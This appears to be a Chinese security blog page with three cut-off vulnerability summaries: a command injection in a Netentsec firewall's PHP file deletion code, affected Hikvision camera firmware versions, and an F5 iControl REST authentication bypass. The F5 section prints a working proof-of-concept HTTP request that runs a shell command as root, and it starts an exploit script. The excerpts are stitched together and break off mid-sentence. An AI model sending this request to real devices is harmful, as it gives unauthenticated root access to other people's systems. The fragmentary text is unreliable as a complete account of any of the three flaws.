原理网康防火墙HearBeat.php文件中将参数method赋值为delTestFile时,可触发文件删除操作,在data参数中指定需要删除的文件,由于删除文件的操作是通过系统命令完成的,导致命令注入漏洞。 public function deleteImage($params){//params传入一个字典 $basePath = '/var/www/html/'; $imgPath = $this->imagePath; $params = $params->data;//获取data中的文件路径 $cmd = "cd $imgPath \n /bin/rm -rf ";//命令主体 $existDefault=false; foreach ($params as $img){ if($img=='default.png'){ $existDefault=true; }
原理由于摄像头对传入的字符串未做进一步确认,导致恶意的命令被注入到正常命令中。参考文章:https://kms.app/archives/399/影响范围DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 Build 160530DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build
原理在同时设置HTTP基础认证与X-F5-Auth-Token头且值为空时,会绕过程序对身份的验证,通过特定的接口即可进行远程命令执行。影响范围危害可以获取root权限,并以root权限执行命令。POC & EXP手工POST /mgmt/tm/util/bash HTTP/1.1 Host: 192.168.59.7 Content-Type: application/json X-F5-Auth-Token: Authorization: Basic YWRtaW46 Content-Length: 52 { "command": "run", "utilCmdArgs": "-c id" }脚本import requests import json import sys requests.packages.urllib3.disable_warnings() proxies = {'http': 'http://localhost:7890', 'https': 'http://l
Equinox
一个乐于分享的网安人